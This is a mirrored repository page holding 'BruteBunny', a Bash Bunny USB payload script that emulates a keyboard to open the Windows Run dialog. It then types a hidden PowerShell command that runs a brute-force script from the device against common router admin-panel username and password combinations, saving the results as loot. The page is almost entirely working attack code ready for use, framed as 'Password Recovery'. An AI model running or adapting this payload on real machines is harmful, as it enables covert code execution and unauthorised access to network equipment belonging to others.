mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors
44 lines
1.1 KiB
Bash
44 lines
1.1 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: BruteBunny
|
|
# Author: Decoy
|
|
# Version: 1.0
|
|
# Category: Password Recovery
|
|
# Target: Windows XP SP3+
|
|
#
|
|
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
|
# access to the admin panel.
|
|
|
|
# init
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
# set up the things to make it do stuff
|
|
mkdir -p /root/udisk/BruteBunny/loot
|
|
mkdir -p /root/udisk/BruteBunny/wordlists
|
|
|
|
# move wordlists to BruteBunny folder
|
|
cp /root/udisk/payloads/$SWITCH_POSITION/usernames.txt /root/udisk/BruteBunny/wordlists/usernames.txt
|
|
cp /root/udisk/payloads/$SWITCH_POSITION/passwords.txt /root/udisk/BruteBunny/wordlists/passwords.txt
|
|
sync;sleep 1;sync
|
|
|
|
# set attack mode
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# wait for storage
|
|
LED STAGE1
|
|
QUACK DELAY 6000
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
# unleash the brute bunny
|
|
LED STAGE2
|
|
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
|
|
QUACK ENTER
|
|
sleep 10
|
|
|
|
# sync the stuff
|
|
sync;sleep 1;sync
|
|
|
|
LED FINISH
|